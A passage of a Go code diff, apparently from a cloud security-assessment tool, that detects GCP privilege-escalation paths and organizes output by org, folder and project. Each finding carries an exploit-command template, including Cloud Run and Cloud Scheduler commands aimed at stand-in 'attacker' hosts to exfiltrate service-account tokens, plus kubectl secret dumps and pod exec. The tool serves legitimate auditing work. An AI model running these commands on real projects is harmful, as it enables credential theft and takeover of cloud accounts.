--service-account=PRIVILEGED_SA --allow-unauthenticated", projectID), + ProjectID: projectID, + }) + } + + // Cloud Functions - Update existing function (UpdateCloudFunction) + if hasPerm("cloudfunctions.functions.update") && hasPerm("iam.serviceAccounts.actAs") { + perms := []string{"cloudfunctions.functions.update", "iam.serviceAccounts.actAs"} + if hasPerm("cloudfunctions.functions.sourceCodeSet") { + perms = append(perms, "cloudfunctions.functions.sourceCodeSet") + } + paths = append(paths, PrivescPath{ + Principal: cleanMember, + PrincipalType: principalType, + Method: "UpdateCloudFunction", + TargetResource: "Existing Cloud Functions", + Permissions: perms, + RiskLevel: "CRITICAL", + Description: "Can update existing Cloud Functions with malicious code", + ExploitCommand: fmt.Sprintf("gcloud functions deploy EXISTING_FUNCTION --project=%s --source=. --entry-point=malicious", projectID), + ProjectID: projectID, + }) + } + + // Cloud Run - Create with SA (ExfilCloudRunServiceAuthCall) + if hasPerm("run.services.create") && hasPerm("iam.serviceAccounts.actAs") { + perms := []string{"run.services.create", "iam.serviceAccounts.actAs"} + if hasPerm("run.routes.invoke") { + perms = append(perms, "run.routes.invoke") + } + paths = append(paths, PrivescPath{ + Principal: cleanMember, + PrincipalType: principalType, + Method: "ExfilCloudRunServiceAuthCall", + TargetResource: "Cloud Run", + Permissions: perms, + RiskLevel: "CRITICAL", + Description: "Can deploy Cloud Run service with privileged SA to exfiltrate credentials", + ExploitCommand: fmt.Sprintf("gcloud run deploy exfil --project=%s --image=gcr.io/attacker/exfil --service-account=PRIVILEGED_SA@%s.iam.gserviceaccount.com --platform=managed --region=us-central1", projectID, projectID), + ProjectID: projectID, + }) + } + + // Cloud Run - Create with SA and make public (ExfilCloudRunServiceUnauthCall) + if hasPerm("run.services.create") && hasPerm("iam.serviceAccounts.actAs") && hasPerm("run.services.setIamPolicy") { + paths = append(paths, PrivescPath{ + Principal: cleanMember, + PrincipalType: principalType, + Method: "ExfilCloudRunServiceUnauthCall", + TargetResource: "Cloud Run (public)", + Permissions: []string{"run.services.create", "iam.serviceAccounts.actAs", "run.services.setIamPolicy"}, + RiskLevel: "CRITICAL", + Description: "Can deploy Cloud Run service with privileged SA and make it publicly accessible", + ExploitCommand: fmt.Sprintf("gcloud run deploy exfil --project=%s --image=gcr.io/attacker/exfil --service-account=PRIVILEGED_SA --allow-unauthenticated --platform=managed --region=us-central1", projectID), + ProjectID: projectID, + }) + } + + // ======================================== + // CI/CD - CRITICAL + // ======================================== + + // Cloud Build (RCECloudBuildBuildServer) if dp, ok := foundDangerous["cloudbuild.builds.create"]; ok { paths = append(paths, PrivescPath{ Principal: cleanMember, PrincipalType: principalType, - Method: "Cloud Build SA Abuse", + Method: "RCECloudBuildBuildServer", TargetResource: "Cloud Build", Permissions: []string{dp.Permission}, - RiskLevel: dp.RiskLevel, - Description: "Can run builds with Cloud Build service account (often has elevated privileges)", - ExploitCommand: "gcloud builds submit --config=cloudbuild.yaml .", + RiskLevel: "CRITICAL", + Description: "Can execute arbitrary code via Cloud Build with its service account (often has elevated privileges)", + ExploitCommand: fmt.Sprintf("gcloud builds submit --project=%s --config=cloudbuild.yaml .", projectID), + ProjectID: projectID, + }) + } + + // ======================================== + // SCHEDULER - HIGH + // ======================================== + + // Cloud Scheduler (CreateCloudSchedulerHTTPRequest) + if hasPerm("cloudscheduler.jobs.create") && hasPerm("iam.serviceAccounts.actAs") { + perms := []string{"cloudscheduler.jobs.create", "iam.serviceAccounts.actAs"} + if hasPerm("cloudscheduler.locations.list") { + perms = append(perms, "cloudscheduler.locations.list") + } + paths = append(paths, PrivescPath{ + Principal: cleanMember, + PrincipalType: principalType, + Method: "CreateCloudSchedulerHTTPRequest", + TargetResource: "Cloud Scheduler", + Permissions: perms, + RiskLevel: "HIGH", + Description: "Can create scheduled HTTP requests that run as privileged service account", + ExploitCommand: fmt.Sprintf("gcloud scheduler jobs create http exfil --project=%s --schedule='* * * * *' --uri=https://attacker.com/callback --oidc-service-account-email=PRIVILEGED_SA@%s.iam.gserviceaccount.com", projectID, projectID), ProjectID: projectID, }) } + // ======================================== + // DEPLOYMENT MANAGER - CRITICAL + // ======================================== + + // Deployment Manager (CreateDeploymentManagerDeployment) + if dp, ok := foundDangerous["deploymentmanager.deployments.create"]; ok { + paths = append(paths, PrivescPath{ + Principal: cleanMember, + PrincipalType: principalType, + Method: "CreateDeploymentManagerDeployment", + TargetResource: "Deployment Manager", + Permissions: []string{dp.Permission}, + RiskLevel: "CRITICAL", + Description: "Can deploy arbitrary infrastructure with Deployment Manager service account (often has project owner)", + ExploitCommand: fmt.Sprintf("gcloud deployment-manager deployments create pwned --project=%s --config=deployment.yaml", projectID), + ProjectID: projectID, + }) + } + + // ======================================== + // GKE - HIGH + // ======================================== + // GKE Credentials if dp, ok := foundDangerous["container.clusters.getCredentials"]; ok { paths = append(paths, PrivescPath{ Principal: cleanMember, PrincipalType: principalType, - Method: "GKE Cluster Access", + Method: "GKEClusterAccess", TargetResource: "All project GKE clusters", Permissions: []string{dp.Permission}, - RiskLevel: dp.RiskLevel, - Description: "Can get credentials for GKE clusters", - ExploitCommand: "gcloud container clusters get-credentials CLUSTER_NAME --zone=ZONE", + RiskLevel: "HIGH", + Description: "Can get credentials for GKE clusters to access Kubernetes API", + ExploitCommand: fmt.Sprintf("gcloud container clusters get-credentials CLUSTER_NAME --zone=ZONE --project=%s", projectID), + ProjectID: projectID, + }) + } + + // GKE Pod Exec + if dp, ok := foundDangerous["container.pods.exec"]; ok { + paths = append(paths, PrivescPath{ + Principal: cleanMember, + PrincipalType: principalType, + Method: "GKEPodExec", + TargetResource: "All project GKE pods", + Permissions: []string{dp.Permission}, + RiskLevel: "HIGH", + Description: "Can exec into GKE pods to steal service account tokens", + ExploitCommand: "kubectl exec -it POD_NAME -- /bin/sh", + ProjectID: projectID, + }) + } + + // GKE Secrets + if dp, ok := foundDangerous["container.secrets.get"]; ok { + paths = append(paths, PrivescPath{ + Principal: cleanMember, + PrincipalType: principalType, + Method: "GKESecretsAccess", + TargetResource: "All project GKE secrets", + Permissions: []string{dp.Permission}, + RiskLevel: "HIGH", + Description: "Can read Kubernetes secrets including service account tokens", + ExploitCommand: "kubectl get secrets -o yaml", ProjectID: projectID, }) } + // ======================================== + // SECRETS - HIGH + // ======================================== + // Secret Access if dp, ok := foundDangerous["secretmanager.versions.access"]; ok { paths = append(paths, PrivescPath{ Principal: cleanMember, PrincipalType: principalType, - Method: "Secret Access", + Method: "SecretManagerAccess", TargetResource: "All project secrets", Permissions: []string{dp.Permission}, - RiskLevel: dp.RiskLevel, + RiskLevel: "HIGH", Description: "Can read secret values from Secret Manager", - ExploitCommand: "gcloud secrets versions access latest --secret=SECRET_NAME", + ExploitCommand: fmt.Sprintf("gcloud secrets versions access latest --secret=SECRET_NAME --project=%s", projectID), ProjectID: projectID, }) } - // SignBlob for GCS Signed URLs - if dp, ok := foundDangerous["iam.serviceAccounts.signBlob"]; ok { + // ======================================== + // API KEYS - HIGH/MEDIUM + // ======================================== + + // Create API Key (CreateAPIKey) + if dp, ok := foundDangerous["serviceusage.apiKeys.create"]; ok { paths = append(paths, PrivescPath{ Principal: cleanMember, PrincipalType: principalType, - Method: "GCS Signed URL Generation", - TargetResource: "All project service accounts", + Method: "CreateAPIKey", + TargetResource: "Project API keys", + Permissions: []string{dp.Permission}, + RiskLevel: "HIGH", + Description: "Can create API keys for project access", + ExploitCommand: fmt.Sprintf("gcloud alpha services api-keys create --project=%s", projectID), + ProjectID: projectID, + }) + } + + // View API Keys (ViewExistingAPIKeys) + if dp, ok := foundDangerous["serviceusage.apiKeys.list"]; ok { + paths = append(paths, PrivescPath{ + Principal: cleanMember, + PrincipalType: principalType, + Method: "ViewExistingAPIKeys", + TargetResource: "Project API keys", Permissions: []string{dp.Permission}, - RiskLevel: dp.RiskLevel, - Description: "Can sign blobs as SA to generate GCS signed URLs", - ExploitCommand: "gsutil signurl -u TARGET_SA@project.iam.gserviceaccount.com gs://bucket/object", + RiskLevel: "MEDIUM", + Description: "Can list existing API keys (may contain unrestricted keys)", + ExploitCommand: fmt.Sprintf("gcloud alpha services api-keys list --project=%s", projectID), ProjectID: projectID, }) } @@ -440,3 +873,215 @@ func cleanMemberName(member string) string { } return member } + +// analyzePermissionsForPrivescWithScope is like analyzePermissionsForPrivesc but adds scope information +func (s *PrivescService) analyzePermissionsForPrivescWithScope(member, role string, permissions []string, projectID, scopeType, scopeID, scopeName string) []PrivescPath { + // Get paths from original function + paths := s.analyzePermissionsForPrivesc(member, role, permissions, projectID) + + // Add scope information to each path + for i := range paths { + paths[i].ScopeType = scopeType + paths[i].ScopeID = scopeID + paths[i].ScopeName = scopeName + } + + return paths +} + +// AnalyzeOrganizationPrivesc analyzes all accessible organizations for privilege escalation paths +func (s *PrivescService) AnalyzeOrganizationPrivesc(ctx context.Context) ([]PrivescPath, map[string]string, []string, error) { + var paths []PrivescPath + orgNames := make(map[string]string) + var orgIDs []string + + // Create organizations client + var orgsClient *resourcemanager.OrganizationsClient + var err error + if s.session != nil { + orgsClient, err = resourcemanager.NewOrganizationsClient(ctx, s.session.GetClientOption()) + } else { + orgsClient, err = resourcemanager.NewOrganizationsClient(ctx) + } + if err != nil { + return nil, orgNames, orgIDs, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + defer orgsClient.Close() + + // Get IAM service for role resolution + var iamService *iam.Service + if s.session != nil { + iamService, err = iam.NewService(ctx, s.session.GetClientOption()) + } else { + iamService, err = iam.NewService(ctx) + } + if err != nil { + iamService = nil + } + + // Search for organizations + searchReq := &resourcemanagerpb.SearchOrganizationsRequest{} + it := orgsClient.SearchOrganizations(ctx, searchReq) + for { + org, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + parsedErr := gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + gcpinternal.HandleGCPError(parsedErr, logger, globals.GCP_PRIVESC_MODULE_NAME, "Could not search organizations") + break + } + + orgID := strings.TrimPrefix(org.Name, "organizations/") + orgNames[orgID] = org.DisplayName + orgIDs = append(orgIDs, orgID) + + // Get IAM policy for this organization + policy, err := orgsClient.GetIamPolicy(ctx, &iampb.GetIamPolicyRequest{ + Resource: org.Name, + }) + if err != nil { + continue + } + + // Analyze each binding for privesc + for _, binding := range policy.Bindings { + permissions := s.getRolePermissions(iamService, binding.Role, "") + for _, member := range binding.Members { + // For org-level bindings, use empty projectID but set scope info + memberPaths := s.analyzePermissionsForPrivescWithScope( + member, binding.Role, permissions, "", + "organization", orgID, org.DisplayName, + ) + paths = append(paths, memberPaths...) + } + } + } + + return paths, orgNames, orgIDs, nil +} + +// AnalyzeFolderPrivesc analyzes all accessible folders for privilege escalation paths +func (s *PrivescService) AnalyzeFolderPrivesc(ctx context.Context) ([]PrivescPath, map[string]string, error) { + var paths []PrivescPath + folderNames := make(map[string]string) + + // Create folders client + var foldersClient *resourcemanager.FoldersClient + var err error + if s.session != nil { + foldersClient, err = resourcemanager.NewFoldersClient(ctx, s.session.GetClientOption()) + } else { + foldersClient, err = resourcemanager.NewFoldersClient(ctx) + } + if err != nil { + return nil, folderNames, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + defer foldersClient.Close() + + // Get IAM service for role resolution + var iamService *iam.Service + if s.session != nil { + iamService, err = iam.NewService(ctx, s.session.GetClientOption()) + } else { + iamService, err = iam.NewService(ctx) + } + if err != nil { + iamService = nil + } + + // Search for folders + searchReq := &resourcemanagerpb.SearchFoldersRequest{} + it := foldersClient.SearchFolders(ctx, searchReq) + for { + folder, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + parsedErr := gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + gcpinternal.HandleGCPError(parsedErr, logger, globals.GCP_PRIVESC_MODULE_NAME, "Could not search folders") + break + } + + folderID := strings.TrimPrefix(folder.Name, "folders/") + folderNames[folderID] = folder.DisplayName + + // Get IAM policy for this folder + policy, err := foldersClient.GetIamPolicy(ctx, &iampb.GetIamPolicyRequest{ + Resource: folder.Name, + }) + if err != nil { + continue + } + + // Analyze each binding for privesc + for _, binding := range policy.Bindings { + permissions := s.getRolePermissions(iamService, binding.Role, "") + for _, member := range binding.Members { + memberPaths := s.analyzePermissionsForPrivescWithScope( + member, binding.Role, permissions, "", + "folder", folderID, folder.DisplayName, + ) + paths = append(paths, memberPaths...) + } + } + } + + return paths, folderNames, nil +} + +// CombinedPrivescAnalysis performs privilege escalation analysis across all scopes (org, folder, project) +func (s *PrivescService) CombinedPrivescAnalysis(ctx context.Context, projectIDs []string, projectNames map[string]string) (*CombinedPrivescData, error) { + result := &CombinedPrivescData{ + OrgPaths: []PrivescPath{}, + FolderPaths: []PrivescPath{}, + ProjectPaths: []PrivescPath{}, + AllPaths: []PrivescPath{}, + OrgNames: make(map[string]string), + FolderNames: make(map[string]string), + OrgIDs: []string{}, + } + + // Analyze organization-level IAM + orgPaths, orgNames, orgIDs, err := s.AnalyzeOrganizationPrivesc(ctx) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_PRIVESC_MODULE_NAME, "Could not analyze organization privesc") + } else { + result.OrgPaths = orgPaths + result.OrgNames = orgNames + result.OrgIDs = orgIDs + result.AllPaths = append(result.AllPaths, orgPaths...) + } + + // Analyze folder-level IAM + folderPaths, folderNames, err := s.AnalyzeFolderPrivesc(ctx) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_PRIVESC_MODULE_NAME, "Could not analyze folder privesc") + } else { + result.FolderPaths = folderPaths + result.FolderNames = folderNames + result.AllPaths = append(result.AllPaths, folderPaths...) + } + + // Analyze project-level IAM + for _, projectID := range projectIDs { + projectName := projectID + if name, ok := projectNames[projectID]; ok { + projectName = name + } + + paths, err := s.AnalyzeProjectPrivescWithName(projectID, projectName) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_PRIVESC_MODULE_NAME, + fmt.Sprintf("Could not analyze privesc for project %s", projectID)) + continue + } + + result.ProjectPaths = append(result.ProjectPaths, paths...) + result.AllPaths = append(result.AllPaths, paths...) + } + + return result, nil +} diff --git a/internal/gcp/base.go b/internal/gcp/base.go index e3f89a00..def66138 100644 --- a/internal/gcp/base.go +++ b/internal/gcp/base.go @@ -128,6 +128,16 @@ func ParseGCPError(err error, apiName string) error { return err } +// IsPermissionDenied checks if an error is a permission denied error +func IsPermissionDenied(err error) bool { + return errors.Is(err, ErrPermissionDenied) +} + +// IsAPINotEnabled checks if an error is an API not enabled error +func IsAPINotEnabled(err error) bool { + return errors.Is(err, ErrAPINotEnabled) +} + // HandleGCPError logs an appropriate message for a GCP API error and returns true if execution should continue // Returns false if the error is fatal and the caller should stop processing func HandleGCPError(err error, logger internal.Logger, moduleName string, resourceDesc string) bool { @@ -181,6 +191,10 @@ type CommandContext struct { OutputDirectory string Format string Goroutines int + FlatOutput bool // When true, use legacy flat output structure + + // Hierarchy support for per-project output + Hierarchy *ScopeHierarchy // Populated by DetectScopeHierarchy } // ------------------------------ @@ -210,6 +224,10 @@ type BaseGCPModule struct { OutputDirectory string Format string Goroutines int + FlatOutput bool // When true, use legacy flat output structure + + // Hierarchy support for per-project output + Hierarchy *ScopeHierarchy // Populated by DetectScopeHierarchy // Progress tracking (AWS/Azure style) CommandCounter internal.CommandCounter @@ -238,6 +256,20 @@ func NewBaseGCPModule(cmdCtx *CommandContext) BaseGCPModule { OutputDirectory: cmdCtx.OutputDirectory, Format: cmdCtx.Format, Goroutines: cmdCtx.Goroutines, + FlatOutput: cmdCtx.FlatOutput, + Hierarchy: cmdCtx.Hierarchy, + } +} + +// BuildPathBuilder creates a PathBuilder function for hierarchical output +// This function returns a closure that builds paths based on the module's configuration +func (b *BaseGCPModule) BuildPathBuilder() internal.PathBuilder { + return func(scopeType string, scopeID string) string { + if b.Hierarchy == nil { + // Fallback to flat output if no hierarchy is available + return BuildFlatPath(b.OutputDirectory, b.Account, &ScopeHierarchy{}) + } + return BuildHierarchicalPath(b.OutputDirectory, b.Account, b.Hierarchy, scopeType, scopeID) } } @@ -354,6 +386,7 @@ func InitializeCommandContext(cmd *cobra.Command, moduleName string) (*CommandCo wrap, _ := parentCmd.PersistentFlags().GetBool("wrap") outputDirectory, _ := parentCmd.PersistentFlags().GetString("outdir") format, _ := parentCmd.PersistentFlags().GetString("output") + flatOutput, _ := parentCmd.PersistentFlags().GetBool("flat-output") // Default to "all" format if not set (GCP doesn't expose this flag yet) if format == "" { @@ -394,6 +427,12 @@ func InitializeCommandContext(cmd *cobra.Command, moduleName string) (*CommandCo logger.InfoM(fmt.Sprintf("Resolved %d project(s), account: %s", len(projectIDs), account), moduleName) } + // -------------------- Get hierarchy from context (if populated) -------------------- + var hierarchy *ScopeHierarchy + if value, ok := ctx.Value("hierarchy").(*ScopeHierarchy); ok { + hierarchy = value + } + // -------------------- Build and return context -------------------- return &CommandContext{ Ctx: ctx, @@ -406,5 +445,7 @@ func InitializeCommandContext(cmd *cobra.Command, moduleName string) (*CommandCo OutputDirectory: outputDirectory, Format: format, Goroutines: 5, // Default concurrency + FlatOutput: flatOutput, + Hierarchy: hierarchy, }, nil } diff --git a/internal/gcp/hierarchy.go b/internal/gcp/hierarchy.go new file mode 100644 index 00000000..399c8273 --- /dev/null +++ b/internal/gcp/hierarchy.go @@ -0,0 +1,463 @@ +package gcpinternal + +import ( + "path/filepath" + "regexp" + "strings" +) + +// ------------------------------ +// Scope Hierarchy Types +// ------------------------------ + +// ScopeHierarchy represents the discovered GCP resource hierarchy +type ScopeHierarchy struct { + Organizations []OrgScope // Organizations (may be empty if no org access) + Folders []FolderScope // Folders (may be empty) + Projects []ProjectScope // All projects being processed + StandaloneProjs []string // Project IDs not belonging to any known org +} + +// OrgScope represents an organization in the hierarchy +type OrgScope struct { + ID string // Numeric org ID (e.g., "672370982061") + DisplayName string // Org display name (e.g., "acme.com") - may be empty if inaccessible + Accessible bool // Whether we can enumerate org-level resources + FolderIDs []string // Folder IDs directly under this org + ProjectIDs []string // Project IDs under this org (directly or via folders) +} + +// FolderScope represents a folder in the hierarchy +type FolderScope struct { + ID string // Folder ID + DisplayName string // Folder display name + ParentType string // "organization" or "folder" + ParentID string // Parent org or folder ID + ProjectIDs []string // Project IDs directly under this folder + Depth int // Depth in hierarchy (0 = direct child of org) +} + +// ProjectScope represents a project in the hierarchy +type ProjectScope struct { + ID string // Project ID + Name string // Project display name + OrgID string // Parent org ID (empty if standalone/unknown) + FolderID string // Direct parent folder ID (empty if directly under org) +} + +// ------------------------------ +// Ancestry Node (for building hierarchy) +// ------------------------------ + +// AncestryNode represents a node in the resource hierarchy ancestry +type AncestryNode struct { + Type string // organization, folder, project + ID string + DisplayName string + Parent string + Depth int +} + +// OrganizationData represents organization info for hierarchy building +type OrganizationData struct { + Name string // organizations/ORGID + DisplayName string +} + +// ------------------------------ +// Hierarchy Builder Interface +// ------------------------------ + +// HierarchyDataProvider interface allows fetching hierarchy data without import cycles +type HierarchyDataProvider interface { + GetProjectAncestry(projectID string) ([]AncestryNode, error) + SearchOrganizations() ([]OrganizationData, error) +} + +// ------------------------------ +// Hierarchy Detection +// ------------------------------ + +// BuildScopeHierarchy analyzes the given projects and discovers their organizational hierarchy. +// It uses the provided HierarchyDataProvider to fetch data without import cycles. +// It attempts to: +// 1. Get org ID from project ancestry for each project +// 2. Get org display names (requires org-level permissions) +// 3. Get folder information (from ancestry data) +// 4. Identify standalone projects (no org association) +func BuildScopeHierarchy(projectIDs []string, provider HierarchyDataProvider) (*ScopeHierarchy, error) { + hierarchy := &ScopeHierarchy{ + Organizations: []OrgScope{}, + Folders: []FolderScope{}, + Projects: []ProjectScope{}, + StandaloneProjs: []string{}, + } + + if len(projectIDs) == 0 { + return hierarchy, nil + } + + // Maps to track relationships + orgProjects := make(map[string][]string) // orgID -> projectIDs + projectToOrg := make(map[string]string) // projectID -> orgID + projectToFolder := make(map[string]string) // projectID -> folderID + folderToOrg := make(map[string]string) // folderID -> orgID + folderInfo := make(map[string]FolderScope) // folderID -> FolderScope + projectNames := make(map[string]string) // projectID -> displayName + + // Step 1: Get project ancestry for each project to discover org/folder relationships + for _, projectID := range projectIDs { + ancestry, err := provider.GetProjectAncestry(projectID) + if err != nil { + // Can't get ancestry - mark as standalone for now + hierarchy.StandaloneProjs = append(hierarchy.StandaloneProjs, projectID) + continue + } + + // Parse ancestry to find org and folder + var foundOrg, foundFolder string + for _, node := range ancestry { + switch node.Type { + case "organization": + foundOrg = node.ID + case "folder": + if foundFolder == "" { + // First folder is the direct parent + foundFolder = node.ID + } + folderToOrg[node.ID] = foundOrg + if _, exists := folderInfo[node.ID]; !exists { + folderInfo[node.ID] = FolderScope{ + ID: node.ID, + DisplayName: node.DisplayName, + ParentType: node.Type, + ParentID: "", // Will be filled later + Depth: node.Depth, + } + } + case "project": + projectNames[node.ID] = node.DisplayName + } + } + + if foundOrg != "" { + projectToOrg[projectID] = foundOrg + orgProjects[foundOrg] = append(orgProjects[foundOrg], projectID) + } else { + hierarchy.StandaloneProjs = append(hierarchy.StandaloneProjs, projectID) + } + + if foundFolder != "" { + projectToFolder[projectID] = foundFolder + } + } + + // Step 2: Try to get org display names (requires resourcemanager.organizations.get) + orgDisplayNames := make(map[string]string) + orgAccessible := make(map[string]bool) + + orgs, err := provider.SearchOrganizations() + if err == nil { + for _, org := range orgs { + orgID := strings.TrimPrefix(org.Name, "organizations/") + orgDisplayNames[orgID] = org.DisplayName + orgAccessible[orgID] = true + } + } + + // Step 3: Build organization scopes + for orgID, projIDs := range orgProjects { + orgScope := OrgScope{ + ID: orgID, + DisplayName: orgDisplayNames[orgID], // May be empty + Accessible: orgAccessible[orgID], + ProjectIDs: projIDs, + FolderIDs: []string{}, + } + + // Collect folders for this org + for folderID, fOrgID := range folderToOrg { + if fOrgID == orgID { + orgScope.FolderIDs = append(orgScope.FolderIDs, folderID) + } + } + + hierarchy.Organizations = append(hierarchy.Organizations, orgScope) + } + + // Step 4: Build folder scopes + for folderID, fScope := range folderInfo { + // Find projects directly under this folder + for projID, fID := range projectToFolder { + if fID == folderID { + fScope.ProjectIDs = append(fScope.ProjectIDs, projID) + } + } + hierarchy.Folders = append(hierarchy.Folders, fScope) + } + + // Step 5: Build project scopes + for _, projectID := range projectIDs { + pScope := ProjectScope{ + ID: projectID, + Name: projectNames[projectID], + OrgID: projectToOrg[projectID], + FolderID: projectToFolder[projectID], + } + if pScope.Name == "" { + pScope.Name = projectID // Fallback to ID + } + hierarchy.Projects = append(hierarchy.Projects, pScope) + } + + return hierarchy, nil +} + +// ------------------------------ +// Path Building Functions +// ------------------------------ + +// GetOrgIdentifier returns the best identifier for an org (display name or ID) +func (h *ScopeHierarchy) GetOrgIdentifier(orgID string) string { + for _, org := range h.Organizations { + if org.ID == orgID { + if org.DisplayName != "" { + return org.DisplayName + } + return org.ID + } + } + return orgID +} + +// GetProjectOrg returns the org ID for a project, or empty string if standalone +func (h *ScopeHierarchy) GetProjectOrg(projectID string) string { + for _, proj := range h.Projects { + if proj.ID == projectID { + return proj.OrgID + } + } + return "" +} + +// GetProjectName returns the display name for a project +func (h *ScopeHierarchy) GetProjectName(projectID string) string { + for _, proj := range h.Projects { + if proj.ID == projectID { + if proj.Name != "" { + return proj.Name + } + return proj.ID + } + } + return projectID +} + +// IsStandalone returns true if the project has no org association +func (h *ScopeHierarchy) IsStandalone(projectID string) bool { + for _, standaloneID := range h.StandaloneProjs { + if standaloneID == projectID { + return true + } + } + return false +} + +// HasOrgAccess returns true if at least one org is accessible +func (h *ScopeHierarchy) HasOrgAccess() bool { + for _, org := range h.Organizations { + if org.Accessible { + return true + } + } + return false +} + +// ------------------------------ +// Output Path Builder +// ------------------------------ + +// sanitizePathComponent removes or replaces invalid characters for directory names +func sanitizePathComponent(name string) string { + // Replace characters invalid on Windows/Linux + re := regexp.MustCompile(`[<>:"/\\|?*\x00-\x1f]`) + sanitized := re.ReplaceAllString(name, "_") + + // Trim spaces and dots from ends (Windows restriction) + sanitized = strings.TrimRight(sanitized, ". ") + sanitized = strings.TrimLeft(sanitized, ". ") + + // Limit length + if len(sanitized) > 100 { + sanitized = sanitized[:100] + } + + if sanitized == "" { + sanitized = "unknown" + } + + return sanitized +} + +// BuildHierarchicalPath constructs the output path for hierarchical output. +// Parameters: +// - baseDir: Base output directory (e.g., ~/.cloudfox/cloudfox-output) +// - principal: Authenticated account email +// - hierarchy: The detected scope hierarchy +// - scopeType: "organization", "folder", or "project" +// - scopeID: The ID of the scope (orgID, folderID, or projectID) +// +// Returns paths like: +// - Org level: baseDir/cloudfox-output/gcp/principal/[O]org-name/ +// - Folder level: baseDir/cloudfox-output/gcp/principal/[O]org-name/[F]folder-name/ +// - Project under org: baseDir/cloudfox-output/gcp/principal/[O]org-name/[P]project-name/ +// - Project under folder: baseDir/cloudfox-output/gcp/principal/[O]org-name/[F]folder/[P]project/ +// - Standalone project: baseDir/cloudfox-output/gcp/principal/[P]project-name/ +func BuildHierarchicalPath( + baseDir string, + principal string, + hierarchy *ScopeHierarchy, + scopeType string, + scopeID string, +) string { + base := filepath.Join(baseDir, "cloudfox-output", "gcp", sanitizePathComponent(principal)) + + switch scopeType { + case "organization": + orgName := hierarchy.GetOrgIdentifier(scopeID) + return filepath.Join(base, "[O]"+sanitizePathComponent(orgName)) + + case "folder": + // Find the folder and its parent org + var folder *FolderScope + for i := range hierarchy.Folders { + if hierarchy.Folders[i].ID == scopeID { + folder = &hierarchy.Folders[i] + break + } + } + + if folder == nil { + // Fallback - just use folder ID + return filepath.Join(base, "[F]"+sanitizePathComponent(scopeID)) + } + + // Get org path first + orgID := "" + for oID, fIDs := range getOrgFolderMap(hierarchy) { + for _, fID := range fIDs { + if fID == scopeID { + orgID = oID + break + } + } + } + + if orgID != "" { + orgName := hierarchy.GetOrgIdentifier(orgID) + folderName := folder.DisplayName + if folderName == "" { + folderName = folder.ID + } + return filepath.Join(base, "[O]"+sanitizePathComponent(orgName), "[F]"+sanitizePathComponent(folderName)) + } + + // No org found - just folder + folderName := folder.DisplayName + if folderName == "" { + folderName = folder.ID + } + return filepath.Join(base, "[F]"+sanitizePathComponent(folderName)) + + case "project": + projectName := hierarchy.GetProjectName(scopeID) + orgID := hierarchy.GetProjectOrg(scopeID) + + // Standalone project + if orgID == "" || hierarchy.IsStandalone(scopeID) { + return filepath.Join(base, "[P]"+sanitizePathComponent(projectName)) + } + + // Project under org + orgName := hierarchy.GetOrgIdentifier(orgID) + + // Check if project is under a folder + var folderID string + for _, proj := range hierarchy.Projects { + if proj.ID == scopeID && proj.FolderID != "" { + folderID = proj.FolderID + break + } + } + + if folderID != "" { + // Project under folder under org + var folderName string + for _, f := range hierarchy.Folders { + if f.ID == folderID { + folderName = f.DisplayName + if folderName == "" { + folderName = f.ID + } + break + } + } + return filepath.Join(base, "[O]"+sanitizePathComponent(orgName), "[F]"+sanitizePathComponent(folderName), "[P]"+sanitizePathComponent(projectName)) + } + + // Project directly under org + return filepath.Join(base, "[O]"+sanitizePathComponent(orgName), "[P]"+sanitizePathComponent(projectName)) + + default: + // Unknown scope type - use as-is + return filepath.Join(base, sanitizePathComponent(scopeID)) + } +} + +// getOrgFolderMap builds a map of orgID -> folderIDs +func getOrgFolderMap(hierarchy *ScopeHierarchy) map[string][]string { + result := make(map[string][]string) + for _, org := range hierarchy.Organizations { + result[org.ID] = org.FolderIDs + } + return result +} + +// ------------------------------ +// Flat Output Path (Legacy Mode) +// ------------------------------ + +// BuildFlatPath constructs the legacy flat output path (for --flat-output mode) +// All data goes to a single folder based on the "highest" scope available +func BuildFlatPath( + baseDir string, + principal string, + hierarchy *ScopeHierarchy, +) string { + base := filepath.Join(baseDir, "cloudfox-output", "gcp", sanitizePathComponent(principal)) + + // If we have org access, use org-level folder + if len(hierarchy.Organizations) > 0 { + // Use first org (or combine if multiple) + if len(hierarchy.Organizations) == 1 { + orgName := hierarchy.GetOrgIdentifier(hierarchy.Organizations[0].ID) + return filepath.Join(base, "[O]"+sanitizePathComponent(orgName)) + } + // Multiple orgs - use combined name + orgName := hierarchy.GetOrgIdentifier(hierarchy.Organizations[0].ID) + return filepath.Join(base, "[O]"+sanitizePathComponent(orgName)+"_and_"+ + sanitizePathComponent(string(rune(len(hierarchy.Organizations)-1)))+"_more") + } + + // No org - use project-level + if len(hierarchy.Projects) > 0 { + if len(hierarchy.Projects) == 1 { + return filepath.Join(base, "[P]"+sanitizePathComponent(hierarchy.Projects[0].Name)) + } + // Multiple projects - use combined name + return filepath.Join(base, "[P]"+sanitizePathComponent(hierarchy.Projects[0].Name)+ + "_and_"+sanitizePathComponent(string(rune(len(hierarchy.Projects)-1)))+"_more") + } + + return filepath.Join(base, "unknown-scope") +} diff --git a/internal/gcp/privesc_cache.go b/internal/gcp/privesc_cache.go new file mode 100644 index 00000000..451e73d4 --- /dev/null +++ b/internal/gcp/privesc_cache.go @@ -0,0 +1,241 @@ +package gcpinternal + +import ( + "context" + "strings" + "sync" +) + +// PrivescCache holds cached privilege escalation analysis results +// This allows modules to quickly check if a service account or principal has privesc potential +// without re-running the full analysis +type PrivescCache struct { + // ServiceAccountPrivesc maps service account email -> list of privesc methods + // Example: "sa@project.iam.gserviceaccount.com" -> ["CreateServiceAccountKey", "GetServiceAccountAccessToken"] + ServiceAccountPrivesc map[string][]PrivescMethod + + // PrincipalPrivesc maps any principal (user, group, SA) -> list of privesc methods + // This includes the full principal string like "serviceAccount:sa@project.iam.gserviceaccount.com" + PrincipalPrivesc map[string][]PrivescMethod + + // Populated indicates whether the cache has been populated with privesc data + Populated bool + + mu sync.RWMutex +} + +// PrivescMethod represents a single privilege escalation method +type PrivescMethod struct { + Method string // e.g., "CreateServiceAccountKey", 